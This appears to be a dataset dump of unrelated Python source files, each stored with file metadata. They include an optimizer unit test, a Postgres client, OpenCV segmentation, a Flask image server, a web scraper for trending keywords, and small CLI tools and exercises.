Page.objects.filter(category=c):\n print(\"- {0} - {1}\".format(str(c), str(p)))\n\ndef add_page(cat, title, url, views=0):\n\n p = Page.objects.get_or_create(category=cat, title=title)[0]\n 
p.url=url\n p.views=views\n p.save()\n return p\n\ndef add_cat(name, views, likes):\n c = Category.objects.get_or_create(name=name)[0]\n c.views=views\n c.likes=likes\n c.save()\n return c\n\n\nif __name__=='__main__':\n print (\"Starting populate scrupt\")\n populate()\n","sub_path":"populate_rango.py","file_name":"populate_rango.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"637822495","text":"\"\"\"\nCopyright 2020 The OneFlow Authors. All rights reserved.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\nimport os\nimport unittest\nfrom collections import OrderedDict\n\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow_addons as tfa\nimport test_global_storage\nfrom test_util import GenArgList\n\nimport oneflow.compatible.single_client.unittest\nfrom oneflow.compatible import single_client as flow\n\ngpus = tf.config.experimental.list_physical_devices(\"GPU\")\nfor gpu in gpus:\n tf.config.experimental.set_memory_growth(gpu, True)\n\n\ndef compare_with_tensorflow_addons_lamb(\n test_case,\n device_type,\n x_shape,\n beta1,\n beta2,\n epsilon,\n weight_decay,\n learning_rate,\n train_iters,\n):\n assert device_type in [\"gpu\", \"cpu\"]\n flow.clear_default_session()\n func_config = flow.FunctionConfig()\n func_config.default_data_type(flow.float32)\n\n @flow.global_function(type=\"train\", function_config=flow.FunctionConfig())\n def testLAMB(\n random_mask: flow.typing.Numpy.Placeholder(x_shape, dtype=flow.float32)\n ) -> flow.typing.Numpy:\n with flow.scope.placement(device_type, \"0:0-0\"):\n x = flow.get_variable(\n name=\"x\",\n shape=x_shape,\n dtype=flow.float32,\n initializer=flow.random_uniform_initializer(minval=-10, maxval=10),\n trainable=True,\n )\n loss = flow.math.reduce_mean(x + random_mask)\n flow.optimizer.LAMB(\n flow.optimizer.PiecewiseConstantScheduler([], [learning_rate]),\n beta1=beta1,\n beta2=beta2,\n epsilon=epsilon,\n weight_decay=weight_decay,\n ).minimize(loss)\n return x\n\n random_masks_seq = []\n for i in range(train_iters + 1):\n random_masks_seq.append(np.random.uniform(size=x_shape).astype(np.float32))\n x_list = []\n init_value = None\n for i in range(train_iters + 1):\n x = testLAMB(random_masks_seq[i])\n x_list.append(x)\n if i == 0:\n init_value = np.copy(x)\n var = tf.Variable(init_value)\n opt = tfa.optimizers.LAMB(\n learning_rate=learning_rate,\n beta_1=beta1,\n beta_2=beta2,\n epsilon=epsilon,\n weight_decay_rate=weight_decay,\n )\n var_list = []\n for i in range(train_iters):\n with tf.GradientTape() as tape:\n if i == 0:\n var0 = tf.identity(var)\n var_list.append(var0)\n random_mask = tf.Variable(random_masks_seq[i])\n loss = tf.reduce_mean(var + random_mask)\n gradients = tape.gradient(loss, var)\n opt.apply_gradients(zip([gradients], [var]))\n var_list.append(var.numpy())\n case = (\n device_type,\n x_shape,\n beta1,\n beta2,\n epsilon,\n weight_decay,\n learning_rate,\n train_iters,\n )\n test_case.assertTrue(len(x_list) == 
len(var_list))\n for (i, o, t) in zip(range(len(var_list)), x_list, var_list):\n diff = o - t\n test_case.assertTrue(\n np.allclose(x_list[i], var_list[i], rtol=0.001, atol=0.001), (i, case, diff)\n )\n diff = x.flatten() - var.numpy().flatten()\n test_case.assertTrue(\n np.allclose(x.flatten(), var.numpy().flatten(), rtol=0.001, atol=0.001),\n (case, diff),\n )\n\n\n@flow.unittest.skip_unless_1n1d()\nclass TestLamb(flow.unittest.TestCase):\n def test_lamb(test_case):\n arg_dict = OrderedDict()\n arg_dict[\"test_case\"] = [test_case]\n arg_dict[\"device_type\"] = [\"cpu\", \"gpu\"]\n arg_dict[\"x_shape\"] = [(10,)]\n arg_dict[\"beta1\"] = [0.9]\n arg_dict[\"beta2\"] = [0.999]\n arg_dict[\"epsilon\"] = [1e-06]\n arg_dict[\"weight_decay\"] = [0.01]\n arg_dict[\"learning_rate\"] = [0.0001]\n arg_dict[\"train_iters\"] = [10]\n for arg in GenArgList(arg_dict):\n compare_with_tensorflow_addons_lamb(*arg)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"python/oneflow/compatible/single_client/test/ops/test_lamb.py","file_name":"test_lamb.py","file_ext":"py","file_size_in_byte":4515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"345757332","text":"import datetime\nfrom typing import Dict, Iterable, Mapping\n\nimport attr\n\nimport aiopg.sa\nfrom aiopg.sa.result import ResultProxy, RowProxy\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects.postgresql import Insert\nfrom sqlalchemy.sql.selectable import Select\nfrom sqlalchemy.sql import and_, not_\nfrom sqlalchemy.sql.schema import Column\n\nDEFAULT_PAGE_SIZE = 100\n\n\nclass BasePostgresClient:\n def __init__(\n self,\n usecase_class,\n engine: aiopg.sa.Engine,\n table: sa.Table,\n db_generated_fields: Iterable[str] = None,\n ):\n self.usecase_class = usecase_class\n self.engine = engine\n self.table = table\n self.db_generated_fields = db_generated_fields or [\"created_at\", \"updated_at\"]\n\n async def insert(self, usecase):\n serialized_usecase: Dict = self._serialize_for_db(usecase)\n async with self.engine.acquire() as conn:\n statement: Insert = (\n self.table.insert()\n .values(**serialized_usecase)\n .returning(*[column for column in self.table.columns])\n )\n results: ResultProxy = await conn.execute(statement)\n return await results.fetchone()\n\n async def select_first_where(\n self, include: Mapping = None, exclude: Mapping = None\n ):\n results = await self.select_where(include=include, exclude=exclude, page_size=1)\n if results:\n return results[0]\n return None\n\n async def select_where(\n self, include: Mapping = None, exclude: Mapping = None, page=0, page_size=None\n ):\n where_clause = self._generate_where_clause(include, exclude)\n page_size = page_size if page_size else DEFAULT_PAGE_SIZE\n async with self.engine.acquire() as conn:\n statement: Select = self.table.select().where(where_clause)\n paginated_statement = self._paginate_query(statement, page, page_size)\n results: ResultProxy = await conn.execute(paginated_statement)\n return [await self._deserialize_from_db(result) async for result in results]\n\n async def update_where(\n self, set_values: Mapping, include: Mapping = None, exclude: Mapping = None\n ):\n where_clause = self._generate_where_clause(include, exclude)\n async with self.engine.acquire() as conn:\n statement = self.table.update.where(where_clause)\n\n def _generate_where_clause(self, include: Mapping = None, exclude: Mapping = None):\n \"\"\"Turn inclusion/exclusion maps into SQLAlchemy `where` clause\"\"\"\n inclusion_ands = 
[]\n exclusion_ands = []\n if include:\n for field, includes in include.items():\n table_col: Column = getattr(self.table.c, field)\n if _isiterable(includes):\n # Use SQL [column] IN [(values)]\n inclusion_ands.append(table_col.in_(includes))\n else:\n # Use SQL [column] = [value]\n inclusion_ands.append(table_col == includes)\n if exclude:\n for field, excludes in exclude.items():\n table_col: Column = getattr(self.table.c, field)\n if _isiterable(excludes):\n # Use SQL [column] NOT IN [(values)]\n exclusion_ands.append(not_(table_col.in_(excludes)))\n else:\n # Use SQL [column] != [value]\n exclusion_ands.append(table_col != excludes)\n return and_(*inclusion_ands, *exclusion_ands)\n\n def _generate_values_clause(self, set_values: Mapping):\n pass\n\n def _paginate_query(self, where_clause, page=0, page_size=None):\n if page_size:\n where_clause = where_clause.limit(page_size)\n if page:\n where_clause = where_clause.offset(page * page_size)\n return where_clause\n\n async def _deserialize_from_db(self, row: RowProxy):\n # returns attrs object if successful\n row_dict = dict(row)\n return self.usecase_class(**row_dict)\n\n def _serialize_for_db(self, usecase) -> Dict:\n # at this point we're assuming attrs objects for usecases\n usecase_dict: Dict = attr.asdict(usecase)\n for db_generated_field in self.db_generated_fields:\n if usecase_dict.get(db_generated_field) is None:\n # inserting a non-nullable field with value None will result in a\n # `psycopg2.IntegrityError: null value in column violates not-null constraint`\n # we delete the value from the dict instead\n del usecase_dict[db_generated_field]\n for k, v in usecase_dict.items():\n if isinstance(v, datetime.datetime):\n usecase_dict[k]: str = v.isoformat()\n return usecase_dict\n\n\ndef _isiterable(var) -> bool:\n return isinstance(var, Iterable) and not isinstance(var, str)\n","sub_path":"app/infrastructure/datastore/postgres/clients/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"23605552","text":"from scipy.misc.pilutil import imresize\n\n__author__ = 'peter'\n\n\ndef resize_while_preserving_aspect_ratio(im, x_dim=None, y_dim=None):\n \"\"\"\n Resize an image, while preserving the aspect ratio. 
For this you need to specify either x_dim or y_dim.\n\n :param im: The image: a 2D or 3D array.\n :param x_dim: An integer indicating the desired size, or None, to leave it loose.\n :param y_dim: An integer indicating the desired size, or None, to leave it loose.\n :return: A new image whose x_dim or y_dim matches the constraint\n \"\"\"\n assert not (x_dim is None and y_dim is None), 'You can not leave both constraints at None!'\n\n x_dim = float('inf') if x_dim is None else x_dim\n y_dim = float('inf') if y_dim is None else y_dim\n\n box_aspect_ratio = x_dim/float(y_dim)\n image_aspect_ratio = im.shape[1] / float(im.shape[0])\n if image_aspect_ratio > box_aspect_ratio: # Active constraint is width\n return imresize(im, size=(int(x_dim/image_aspect_ratio+.5), x_dim))\n else: # Active constraint is height\n return imresize(im, size=(y_dim, int(y_dim*image_aspect_ratio+.5)))\n\n\ndef equalize_image_dims(list_of_images, x_dim = None, y_dim = None):\n \"\"\"\n Resize images so that they match roughly in size although their aspect ratio will be preserved.\n :param list_of_images: A list of numpy arrays representing images (2D or 3D arrays)\n :param size: A 2-tuple specifying the desired (y_size, x_size).\n Each of (y_size, x_size) can be:\n - An integar, meaning that this axis of the image will remain equal or smaller than this number of pixels.\n - None, meaning that there is no constraint along this axis (e.g. (224, None) just states that the image will be\n scaled to 224 pixels in the vertical direction - the horizontal will be whatever size is needed to maintain\n the aspect ratio.\n - 'max': Meaning that we take the largest image size along this axis.\n - 'min': Meaning what we take the largest image size along this axis.\n\n The image will then be scaled so that the image size remains inside this box (although, unless the aspect ratio\n matches exactly, one dimension will be smaller).\n\n :return: Another list of images.\n \"\"\"\n assert not (x_dim is None and y_dim is None), 'You can not leave both constraints at None!'\n if len(list_of_images)==0:\n return []\n x_dim = max(im.shape[1] for im in list_of_images) if x_dim=='max' else \\\n min(im.shape[1] for im in list_of_images) if x_dim=='min' else \\\n x_dim\n y_dim = max(im.shape[0] for im in list_of_images) if y_dim=='max' else \\\n min(im.shape[0] for im in list_of_images) if y_dim=='min' else \\\n y_dim\n new_list_of_images = [resize_while_preserving_aspect_ratio(im, x_dim=x_dim, y_dim=y_dim) for im in list_of_images]\n return new_list_of_images\n","sub_path":"artemis/general/image_ops.py","file_name":"image_ops.py","file_ext":"py","file_size_in_byte":2878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"514414843","text":"import numpy as np\nimport cv2\nfrom matplotlib import pyplot as plt\n\nimg = cv2.imread('coins.jpg')\nimg = cv2.cvtColor(img,cv2.COLOR_RGB2BGR)\ngray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\nret, thresh = cv2.threshold(gray,0,255,cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\n\n# noise removal\nkernel = np.ones((3,3),np.uint8)\nopening = cv2.morphologyEx(thresh,cv2.MORPH_OPEN,kernel, iterations = 2)\n\n# sure background area\nsure_bg = cv2.dilate(opening,kernel,iterations=3)\n\n# Finding sure foreground area\ndist_transform = cv2.distanceTransform(opening,cv2.DIST_L2,5)\nret, sure_fg = cv2.threshold(dist_transform,0.2*dist_transform.max(),255,0)\n\n# Finding unknown region\nsure_fg = np.uint8(sure_fg)\nunknown = cv2.subtract(sure_bg,sure_fg)\n\n# Marker 
labelling\nret, markers = cv2.connectedComponents(sure_fg)\n\n# Add one to all labels so that sure background is not 0, but 1\nmarkers = markers+1\n\n# Now, mark the region of unknown with zero\nmarkers[unknown==255] = 0\n\n# Apply watershed\nmarkers = cv2.watershed(img,markers)\nresult = np.copy(img)\nresult[markers == -1] = [255,0,0]\n\nplt.subplot(2,3,1),plt.imshow(img)\nplt.title('Original'), plt.xticks([]), plt.yticks([])\nplt.subplot(2,3,2),plt.imshow(gray)\nplt.title('Greyscale'), plt.xticks([]), plt.yticks([])\nplt.subplot(2,3,3),plt.imshow(dist_transform)\nplt.title('Distance Transform'), plt.xticks([]), plt.yticks([])\nplt.subplot(2,3,4),plt.imshow(unknown)\nplt.title('Sure fg/bg regions marked purple'), plt.xticks([]), plt.yticks([])\nplt.subplot(2,3,5),plt.imshow(markers)\nplt.title('Marker Image after Segmentation'), plt.xticks([]), plt.yticks([])\nplt.subplot(2,3,6),plt.imshow(result)\nplt.title('Result'), plt.xticks([]), plt.yticks([])\n\nplt.show()\n","sub_path":"watershed_segmentation.py","file_name":"watershed_segmentation.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"571255145","text":"#!/usr/bin/env python3\n\nimport argparse\nimport os\n\nimport command_add\nimport command_show\nimport command_update\n\n\ndef create_parser():\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers(help=\"subcommands\")\n\n parser.add_argument(\"-i\", \"--inventory\", default=\"data/inventory.db\", help=\"path to inventory database\")\n parser.add_argument(\"-m\", \"--market\", default=\"data/market.json\", help=\"path to market database\")\n\n parser_add = subparsers.add_parser(\"add\", help=\"add an item to inventory\")\n parser_add.set_defaults(command=command_add.run)\n parser_add.add_argument(\"item\", nargs=\"?\")\n parser_add.add_argument(\"count\", nargs=\"?\", default=1, type=int)\n\n parser_show = subparsers.add_parser(\"show\", help=\"show full inventory\")\n parser_show.set_defaults(command=command_show.run)\n parser_show.add_argument(\"-d\", \"--ducats\", action=\"store_true\", help=\"sort by ducats/price value\")\n parser_show.add_argument(\"-p\", \"--plats\", action=\"store_true\", help=\"sort by price\")\n\n parser_update = subparsers.add_parser(\"update\")\n parser_update.set_defaults(command=command_update.run)\n\n return parser\n\n\nif __name__ == \"__main__\":\n parser = create_parser()\n args = parser.parse_args()\n os.makedirs(\"data\", exist_ok=True)\n if \"command\" in args:\n args.command(args)\n else:\n parser.print_help()\n","sub_path":"wfih.py","file_name":"wfih.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"131886312","text":"import numpy as np\nimport pandas as pd\n#from matplotlib import pyplot as plt\n#from mpl_toolkits.basemap import Basemap\nimport itertools as it\nimport random\n\nnames = ['State', 'City', 'Latitude', 'Longitude']\nData = pd.read_table('posit.txt', names=names)\n\ncity_to_index = {}\nfor i in xrange(50):\n city_to_index[Data['City'][i]] = i\n\nindex_to_city = {}\nfor key in city_to_index:\n index_to_city[city_to_index[key]] = key\n\ndef distance(city1, city2):\n lat1 = Data['Latitude'][city_to_index[city1]]*np.pi/180.\n lat2 = Data['Latitude'][city_to_index[city2]]*np.pi/180.\n lon1 = Data['Longitude'][city_to_index[city1]]*np.pi/180.\n lon2 = Data['Longitude'][city_to_index[city2]]*np.pi/180.\n dlon = np.abs(lon2 - 
lon1)\n dlat = np.abs(lat2 - lat1)\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = np.sin(dlat/2)**2 + np.cos(lat1) * np.cos(lat2) * np.sin(dlon/2)**2\n c = 2 * np.arcsin(min(1,np.sqrt(a)))\n return c * 6373 # km this value includes some elipticity of the earth\n # and is optimizes for ~39 lat Haversine Formula\n\ndef trip_length(list_of_cities):\n length = 0\n for i in range(len(list_of_cities)-1):\n city1 = list_of_cities[i]\n city2 = list_of_cities[i+1]\n length += distance(city1, city2)\n return length\n\ndef brute_force(start_city, other_cities):\n trips = []\n for perm in list(it.permutations(other_cities)):\n trips.append([start_city]+[x for x in perm]+[start_city])\n for trip in trips:\n trips.remove(trip[::-1])\n distances = np.zeros(len(trips))\n for i in xrange(len(distances)):\n distances[i] = trip_length(trips[i])\n index = np.argsort(distances)\n ordered_distance = distances[index]\n ordered_trips = []\n for value in index:\n ordered_trips.append(trips[value])\n return ordered_distance, ordered_trips\n\ncapitals = list(Data['City'].drop([city_to_index['Juneau'],\n city_to_index['Honolulu']]).values)\nrandom_11 = []\nfor i in range(11):\n random_11.append(random.choice(capitals))\n capitals.remove(random_11[-1])\n\nordered_distance, ordered_trips = brute_force(random_11[0],\n random_11[1:])\n# why do you have to assign this\n\nnp.savez('11_city_brute_force.npz', ordered_distance=ordered_distance,\n ordered_trips=ordered_trips)\n","sub_path":"traveling_sales.py","file_name":"traveling_sales.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"484648432","text":"\nfrom flask import Flask, redirect\nfrom flask import url_for\nimport os\napp = Flask(__name__, static_folder=r'C:\\Users\\matth\\Documents\\Projects\\Family-Pic-Receiver\\Test')\n\n# Make the WSGI interface available at the top level so wfastcgi can get it.\nwsgi_app = app.wsgi_app\nfp=r'C:\\Users\\matth\\Documents\\Projects\\Family-Pic-Receiver\\Test'\n\nclass overallData:\n counter = 0\n\ndataHold = overallData()\n\n@app.route('/')\ndef displayImg():\n dataHold.counter += 1\n for counter,file in enumerate(os.listdir(fp)):\n if counter+1 == dataHold.counter:\n try:\n print(file)\n img_url = url_for('static',filename=file)\n return redirect(img_url)\n except:\n return '

    Sad
    '\n    return '
    Sorry

    '\n\nif __name__ == '__main__':\n app.run(port=8080,debug=True)\n","sub_path":"PicDisp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"584236581","text":"import os\nfrom setuptools import setup\n\nwith open(os.path.join(os.path.dirname(__file__), \"README.md\"), encoding=\"utf-8\") as f:\n long_description = f.read()\n\nmodule_version = \"0.1.5\"\n\nsetup(\n name=\"DailyLogger\",\n packages=[\"DailyLogger\"],\n version=module_version,\n license=\"MIT\",\n description=\"A basic daily logger to log python projects.\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n author=\"Samyak Ratna Tamrakar\",\n author_email=\"samyak.r.tamrakar@gmail.com\",\n url=\"https://github.com/srtamrakar/python-logger\",\n download_url=f\"https://github.com/srtamrakar/python-logger/archive/v_{module_version}.tar.gz\",\n keywords=[\"log\", \"logger\", \"logging\"],\n install_requires=[\"multiprocessing_logging==0.3.0\"],\n classifiers=[\n \"Development Status :: 4 - Beta\", # Either\"3 - Alpha\", \"4 - Beta\" or \"5 - Production/Stable\"\n \"Intended Audience :: Developers\", # Define that your audience are developers\n \"Topic :: Software Development :: Build Tools\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.4\",\n \"Programming Language :: Python :: 3.5\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n ],\n)\n","sub_path":"pypi_install_script/DailyLogger-0.1.5.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"19398679","text":"# predict.py\n#\n# Command line tool to predict the class of an image using a pretrained\n# pytorch network\n#\n# Author: Taylor Weiss\n# Class: Udacity - AI Programming with Python Nanodegree Program\n# Project: Image Classifier\n\n\nimport argparse\nimport data\nimport network\nimport json\nimport os.path\n\n\n# Define command line arguments\nparser = argparse.ArgumentParser(\n description='use a checkpoint to predict the name of an image'\n)\n\nparser.add_argument(\n 'input',\n action='store',\n help='path to the image file'\n)\nparser.add_argument(\n 'checkpoint',\n action='store',\n help='path to the checkpoint file'\n)\nparser.add_argument(\n '--top_k',\n action='store',\n help='number of likely classes to return',\n type=int,\n default=5\n)\nparser.add_argument(\n '--category_names',\n action='store',\n help='path to a json mapping of category labels to names'\n)\nparser.add_argument(\n '--gpu',\n action='store_true',\n help='use the gpu for prediction',\n default=False\n)\n\nargs = parser.parse_args()\n\n# validate and convert the image file\nimage_filename = args.input\nif not os.path.isfile(image_filename):\n print('Unable to find image file', image_filename)\n exit()\n\n# BUGBUG: useful for testing, but probably don't want to assume the\n# image is from the image dataset\nimage_category = image_filename.split(os.sep)[-2]\n\nimage_data = data.process_image(args.input)\n\n# create the network\ndevice = 'cuda' if args.gpu else 'cpu'\nmodel = network.load_network(args.checkpoint, device)\n\n# predict\nprobs, classes = network.predict(image_data, model, device, topk=args.top_k)\n\n# Load the category to name mapping if provided\ncat_to_name = None\nif 
args.category_names and os.path.isfile(args.category_names):\n with open(args.category_names, 'r') as f:\n cat_to_name = json.load(f)\n\n# output results\nprint('Image category:', image_category)\nif cat_to_name:\n print('Image name:', cat_to_name[image_category])\nprint('Probabilities:', probs)\nprint('Classes:', classes)\nif cat_to_name:\n names = [cat_to_name[cat] for cat in classes]\n print('Names:', names)\n","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"597123587","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n\nThe following script performs the necessary NLP enrichment on the documents.\n\nExamples\n--------\n\n.. code-block:: bash\n\n python document_enrichment --cores 2 --fields title abstract --inputs \\\nsample_dataset/patent.sample* --output .\n\n\"\"\"\n\nimport os\nimport argparse\nimport multiprocessing as mp\n\nfrom spacy_enrichment.spacy_enrichment import enrich_documents\n\n\ndef run_enricher(args):\n \"\"\"\n\n Perform enrichment on multiple document files in parallel.\n\n Parameters\n ----------\n args : dict\n Arguments.\n\n \"\"\"\n\n if args.cores == 1:\n for ipath in args.inputs:\n enrich_documents(ipath, args)\n else:\n pool = mp.Pool(args.cores)\n for ipath in args.inputs:\n res = pool.apply_async(enrich_documents, args=(ipath, args, ))\n pool.close()\n pool.join()\n if not res.successful():\n print(res.get())\n\n\ndef files_path_validation(paths):\n \"\"\" Validation of a list of file paths.\n\n Parameters\n ----------\n paths : list\n A list of paths to files.\n\n Raises\n ------\n FileNotFoundError\n Raised if ``path`` doesn't exist.\n\n \"\"\"\n\n for path in paths:\n if not os.path.exists(path):\n raise FileNotFoundError('File {0} is not there.'.format(path))\n\n\ndef dir_path_validation(path, create_dir=False):\n \"\"\"Directory path validation.\n\n Parameters\n ----------\n path : str\n /path/to/a/directory/.\n create_dir : bool\n If True, a new directory will be made once it doesn't exist.\n\n Raises\n ------\n FileNotFoundError\n Raised if ``path`` doesn't exist.\n NotADirectoryError\n Raised if ``path`` is not a directory.\n\n \"\"\"\n\n if not os.path.exists(path):\n if create_dir:\n os.makedirs(path)\n else:\n raise FileNotFoundError('Directory {0} is not there.'.format(path))\n elif not os.path.isdir(path):\n raise NotADirectoryError('{0} is not a directory.'.format(path))\n\n\nif __name__ == \"__main__\":\n pparser = argparse.ArgumentParser()\n pparser.add_argument('--fields', nargs='+', type=str,\n help='Content fields to enrich.')\n pparser.add_argument('--cores', type=int, default=2,\n help='How many cores to use?')\n pparser.add_argument('--noun-chunk', action='store_true',\n help='generate noun chunks')\n pparser.add_argument('--sents', action='store_true',\n help='split to sentences')\n pparser.add_argument('--svo', action='store_true',\n help='generate svo')\n pparser.add_argument('--entity', action='store_true',\n help='generate entities')\n pparser.add_argument('--inputs', nargs='+', required=True,\n help='Path to input documents')\n pparser.add_argument('--output', required=True, help='Path to output dir.')\n pparser.add_argument('--chunk-size', type=int, default=128,\n help='# of documents to handle at once')\n args = pparser.parse_args()\n files_path_validation(args.inputs)\n dir_path_validation(args.output, create_dir=True)\n 
run_enricher(args)\n","sub_path":"document_enrichment.py","file_name":"document_enrichment.py","file_ext":"py","file_size_in_byte":3234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"328824468","text":"import requests\nimport json\nimport os\nimport time\nfrom bs4 import BeautifulSoup\nimport threading\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\ndef jsonload() :\n req = requests.get('https://www.naver.com/')\n html = req.text\n soup = BeautifulSoup(html, 'html.parser')\n mysearch = soup.select(\n '.PM_CL_realtimeKeyword_rolling_base > div > ul > li > a > .ah_k'\n )\n data = json.load(open(os.path.join(BASE_DIR, 'result.json'), mode='r+', encoding='utf8'))\n nowstring = time.strftime(\"%Y%m%d%H%M%S\", time.localtime())\n data[nowstring] = []\n for title in mysearch:\n data[nowstring].append(title.text)\n with open(os.path.join(BASE_DIR, 'result.json'), mode='w+', encoding='utf8') as json_file:\n json.dump(data, json_file, ensure_ascii=False, indent=\"\\t\")\n\ndef main():\n jsonload()\n threading.Timer(10, main).start()\n\nmain()","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"443538280","text":"\"\"\" Kuwin Wyke\nMidwestern State University\nStart: 1 November 2019\nEnd: Work in progress\n\nThis module is designed to be used in the ball recognition program in the\nfolder named \"ball_recognition_v1\". It possess most of the variables to be\nused within the program including dictionaries with all valid motions in\nheart2heart.\n\nALL debug related variables and functions can be found in debug.py\n\"\"\"\n\n# Used for testing purposes. This activates the test environment in the event\n# the robot is not available or there is risky code to be tested\nimport numpy as np\n\n\nclass RobotCom:\n # Used to activate and deactivate automatic movement of the robot\n automatic_control = 1\n\n\n# Filter specific variables **************************************************\nclass FilterVariables:\n _inst = None\n\n @staticmethod\n def get_inst():\n if FilterVariables._inst is None:\n FilterVariables._inst = FilterVariables()\n return FilterVariables._inst\n\n def __init__(self):\n # Set path to variables file\n self._file = \"filter_variables.txt\"\n # Read variables from file\n with open(self._file, \"r\") as file:\n self.lower_limit = int(file.readline())\n self.lower_limit2 = int(file.readline())\n self.lower_limit_hue = int(file.readline())\n self.upper_limit = int(file.readline())\n self.upper_limit2 = int(file.readline())\n self.upper_limit_hue = int(file.readline())\n self.circle_detect_param = int(file.readline())\n self.circle_detect_param2 = int(file.readline())\n\n # Create arrays for filter parameters\n self.lower_range = np.array(\n [\n self.lower_limit_hue,\n self.lower_limit,\n self.lower_limit2\n ]\n )\n self.upper_range = np.array(\n [\n self.upper_limit_hue,\n self.upper_limit,\n self.upper_limit2\n ]\n )\n\n def file_save(self):\n print(\"saving filter variables file\")\n string = str(self.lower_limit) + '\\n'\n string += str(self.lower_limit2) + '\\n'\n string += str(self.lower_limit_hue) + '\\n'\n string += str(self.upper_limit) + '\\n'\n string += str(self.upper_limit2) + '\\n'\n string += str(self.upper_limit_hue) + '\\n'\n string += str(self.circle_detect_param) + '\\n'\n string += str(self.circle_detect_param2)\n with open(self._file, \"w\") as file:\n 
file.write(string)\n\n def get_ranges(self):\n ary = [\n self.lower_range,\n self.upper_range\n ]\n return ary\n\n def get_circle_params(self):\n ary = [\n self.circle_detect_param,\n self.circle_detect_param2\n ]\n return ary\n\n def get_lower(self):\n ary = [\n self.lower_limit,\n self.lower_limit2,\n self.lower_limit_hue,\n ]\n return ary\n\n def get_upper(self):\n ary = [\n self.upper_limit,\n self.upper_limit2,\n self.upper_limit_hue,\n ]\n return ary\n\n def update_ranges(self):\n # Create arrays for filter parameters\n self.lower_range = np.array(\n [\n self.lower_limit_hue,\n self.lower_limit,\n self.lower_limit2\n ]\n )\n self.upper_range = np.array(\n [\n self.upper_limit_hue,\n self.upper_limit,\n self.upper_limit2\n ]\n )\n\n def update_lower_limit(self, value):\n self.lower_limit = value\n\n def update_lower_limit2(self, value):\n self.lower_limit2 = value\n\n def update_lower_limit_hue(self, value):\n self.lower_limit_hue = value\n\n def update_upper_limit(self, value):\n self.upper_limit = value\n\n def update_upper_limit2(self, value):\n self.upper_limit2 = value\n\n def update_upper_limit_hue(self, value):\n self.upper_limit_hue = value\n\n def update_circle_detect_param(self, value):\n self.circle_detect_param = value\n\n def update_circle_detect_param2(self, value):\n self.circle_detect_param2 = value\n\n\nclass ExitControl:\n # General exit flag\n gen = 0\n remote = 0\n # Exit flag for ball detection\n detection = 0\n # Exit flag for calibration loop\n calibrate = 0\n","sub_path":"Old Files/Generation V2/ball_recognition/variables.py","file_name":"variables.py","file_ext":"py","file_size_in_byte":4435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"396246596","text":"def distance(strand_a, strand_b): \n length_of_a=len(strand_a) \n length_of_b=len(strand_b) \n if length_of_a == length_of_b:\n n = 0 \n distance=0 \n while n < length_of_a: \n if strand_a[n]==strand_b[n]: \n distance+=0 \n n+=1\n else: \n distance+=1 \n n+=1 \n return distance \n else:\n raise ValueError ('Make sure both the length of strings are equal')\n\n#########################################################################################################################################\n#Introduction\n#\n#Calculate the Hamming Distance between two DNA strands.\n#\n#Your body is made up of cells that contain DNA. Those cells regularly wear out and need replacing, which they achieve by dividing into #daughter cells. In fact, the average human body experiences about 10 quadrillion cell divisions in a lifetime!\n#\n#When cells divide, their DNA replicates too. Sometimes during this process mistakes happen and single pieces of DNA get encoded with the #incorrect information. If we compare two strands of DNA and count the differences between them we can see how many mistakes occurred. This #is known as the \"Hamming Distance\".\n#\n#We read DNA using the letters C,A,G and T. Two strands might look like this:\n#\n#GAGCCTACTAACGGGAT\n#CATCGTAATGACGGCCT\n#^ ^ ^ ^ ^ ^^\n#\n#They have 7 differences, and therefore the Hamming Distance is 7.\n#\n#The Hamming Distance is useful for lots of things in science, not 